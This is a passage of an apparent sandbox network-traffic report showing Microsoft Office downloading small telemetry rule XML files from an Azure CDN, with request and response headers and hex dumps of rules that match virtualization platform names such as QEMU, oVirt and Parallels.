                                Session IDSource IPSource PortDestination IPDestination Port
                                57192.168.2.55002413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:34 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:34 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:34 GMT
                                Content-Type: text/xml
                                Content-Length: 419
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                ETag: "0x8DC582B9FF95F80"
                                x-ms-request-id: 27481374-801e-0078-46b4-42bac6000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165134Z-174f7845968psccphC1EWRuz9s00000016e000000000ghn6
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                Session IDSource IPSource PortDestination IPDestination Port
                                58192.168.2.55002513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:35 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:35 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:35 GMT
                                Content-Type: text/xml
                                Content-Length: 472
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                ETag: "0x8DC582BB650C2EC"
                                x-ms-request-id: a15be10d-401e-0029-636c-439b43000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165135Z-174f7845968cpnpfhC1EWR3afc00000015qg00000000u4y0
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                59192.168.2.55002613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:35 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:35 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:35 GMT
                                Content-Type: text/xml
                                Content-Length: 468
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                ETag: "0x8DC582BB3EAF226"
                                x-ms-request-id: ce20f954-a01e-006f-7a27-4413cd000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165135Z-174f7845968xlwnmhC1EWR0sv800000015yg00000000rye7
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                Session IDSource IPSource PortDestination IPDestination Port
                                60192.168.2.55002713.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:36 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:36 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:36 GMT
                                Content-Type: text/xml
                                Content-Length: 485
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                ETag: "0x8DC582BB9769355"
                                x-ms-request-id: 352cddbf-b01e-005c-1563-404c66000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165136Z-174f7845968nxc96hC1EWRspw80000001610000000003xyn
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:36 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                61192.168.2.55002813.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:36 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:36 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:36 GMT
                                Content-Type: text/xml
                                Content-Length: 411
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                ETag: "0x8DC582B989AF051"
                                x-ms-request-id: 4d2a6959-e01e-0085-41b2-42c311000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165136Z-174f7845968psccphC1EWRuz9s00000016eg00000000e774
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:36 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session IDSource IPSource PortDestination IPDestination Port
                                62192.168.2.55002913.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:36 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:37 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:36 GMT
                                Content-Type: text/xml
                                Content-Length: 470
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                ETag: "0x8DC582BBB181F65"
                                x-ms-request-id: 20644146-d01e-0017-0115-41b035000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165136Z-174f784596886s2bhC1EWR743w00000016b0000000001syq
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:37 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                63192.168.2.55003013.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:37 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:37 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:37 GMT
                                Content-Type: text/xml
                                Content-Length: 427
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                ETag: "0x8DC582BB556A907"
                                x-ms-request-id: 4e3832d9-101e-005a-31c5-43882b000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165137Z-174f7845968vqt9xhC1EWRgten000000166g00000000mhz2
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:37 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                Session IDSource IPSource PortDestination IPDestination Port
                                64192.168.2.55003113.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:37 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:37 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:37 GMT
                                Content-Type: text/xml
                                Content-Length: 502
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                ETag: "0x8DC582BB6A0D312"
                                x-ms-request-id: 4680a0b7-201e-003c-6bc7-4330f9000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165137Z-174f78459685m244hC1EWRgp2c000000164g000000001zaa
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:37 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                65192.168.2.55003313.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:38 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:39 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:38 GMT
                                Content-Type: text/xml
                                Content-Length: 407
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                ETag: "0x8DC582B9D30478D"
                                x-ms-request-id: b6cdcd34-001e-0014-02c7-435151000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165138Z-174f7845968xr5c2hC1EWRd0hn0000000r30000000009qd3
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:39 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session IDSource IPSource PortDestination IPDestination Port
                                66192.168.2.55003413.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:39 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:39 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:39 GMT
                                Content-Type: text/xml
                                Content-Length: 474
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                ETag: "0x8DC582BB3F48DAE"
                                x-ms-request-id: 1fbe2e95-401e-0083-4bb4-43075c000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165139Z-174f7845968xlwnmhC1EWR0sv80000001640000000003mp1
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:39 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                Session IDSource IPSource PortDestination IPDestination Port
                                67192.168.2.55003513.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:39 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:39 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:39 GMT
                                Content-Type: text/xml
                                Content-Length: 408
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                ETag: "0x8DC582BB9B6040B"
                                x-ms-request-id: b692b84a-501e-000a-1113-450180000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165139Z-174f7845968n2hr8hC1EWR9cag00000015s000000000u1m8
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
                                2024-12-03 16:51:39 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                Session IDSource IPSource PortDestination IPDestination Port
                                68192.168.2.55003613.107.246.63443
                                TimestampBytes transferredDirectionData
                                2024-12-03 16:51:40 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                Connection: Keep-Alive
                                Accept-Encoding: gzip
                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                Host: otelrules.azureedge.net
                                2024-12-03 16:51:40 UTC470INHTTP/1.1 200 OK
                                Date: Tue, 03 Dec 2024 16:51:40 GMT
                                Content-Type: text/xml
                                Content-Length: 469
                                Connection: close
                                Cache-Control: public, max-age=604800, immutable
                                Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                ETag: "0x8DC582BB3CAEBB8"
                                x-ms-request-id: 29785dea-d01e-008e-30ff-44387a000000
                                x-ms-version: 2018-03-28
                                x-azure-ref: 20241203T165140Z-174f7845968qj8jrhC1EWRh41s000000161000000000xuhg
                                x-fd-int-roxy-purgeid: 0
                                X-Cache: TCP_HIT
                                Accept-Ranges: bytes
